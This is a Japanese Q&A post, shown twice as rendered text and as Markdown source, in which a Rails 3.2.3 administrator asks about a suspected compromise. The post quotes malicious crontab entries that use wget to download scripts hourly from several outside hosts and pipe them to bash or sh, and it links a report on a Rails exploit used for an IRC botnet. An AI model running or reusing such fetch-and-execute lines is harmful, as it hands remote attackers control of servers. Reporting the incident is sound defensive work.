QA@IT
«質問へ戻る

質問を投稿

Railsがクラッキングされている?

正確には、「Railsのセキリティーホールを使って、サーバがクラッキングされている」かもしれません。

現在、Rails3.2.3、Ubuntu 10.04.4 LTSを使っているのですが、Railsのセキリティーホールをついて、サーバがクラッキングされている可能性があり、詳細な情報を知りたく質問させていただきました。

詳細を書かせていただきます。

あるサーバで、Crontabによって毎日実行していたプログラムがあったのですが、「2013-05-23」移行の日付を境に、プログラムが実行されていないことに気がつきました。
そこでサーバにログインして、crontab -lを実行してみると、以下の結果が出力されました。

1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget  -O - ddos.cat.com/cmd3|bash;
0 * * * * wget -O - medobra.ru/cmdr | sh - 2>/dev/null 1>/dev/null

どうも既存のCrontabを上書きしてこの設定が書き込まれていたため、プログラムが実行されていないようでした。
そこでこのcolkolduld.comを元に検索を掛けてみたところ、不信な記事があがりました。
Critical Ruby on Rails bug exploited in wild, hacked servers join botnet

「Railsのセキリティーホールをついて、サーバをIRCのBOTにする」というような内容の記事だと思うのですが、恥ずかしながら私の英語力では詳細までつかみきれていません。

どなたかこの件の詳細をご存じないでしょうか?

正確には、「Railsのセキリティーホールを使って、サーバがクラッキングされている」かもしれません。

現在、Rails3.2.3、Ubuntu 10.04.4 LTSを使っているのですが、Railsのセキリティーホールをついて、サーバがクラッキングされている可能性があり、詳細な情報を知りたく質問させていただきました。

詳細を書かせていただきます。

あるサーバで、Crontabによって毎日実行していたプログラムがあったのですが、「2013-05-23」移行の日付を境に、プログラムが実行されていないことに気がつきました。
そこでサーバにログインして、```crontab -l```を実行してみると、以下の結果が出力されました。

```sh
1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget  -O - ddos.cat.com/cmd3|bash;
0 * * * * wget -O - medobra.ru/cmdr | sh - 2>/dev/null 1>/dev/null
```

どうも既存のCrontabを上書きしてこの設定が書き込まれていたため、プログラムが実行されていないようでした。
そこでこの```colkolduld.com```を元に検索を掛けてみたところ、不信な記事があがりました。
[Critical Ruby on Rails bug exploited in wild, hacked servers join botnet](http://arstechnica.com/security/2013/05/critical-ruby-on-rails-bug-exploited-in-wild-hacked-servers-join-botnet/)

「Railsのセキリティーホールをついて、サーバをIRCのBOTにする」というような内容の記事だと思うのですが、恥ずかしながら私の英語力では詳細までつかみきれていません。

どなたかこの件の詳細をご存じないでしょうか?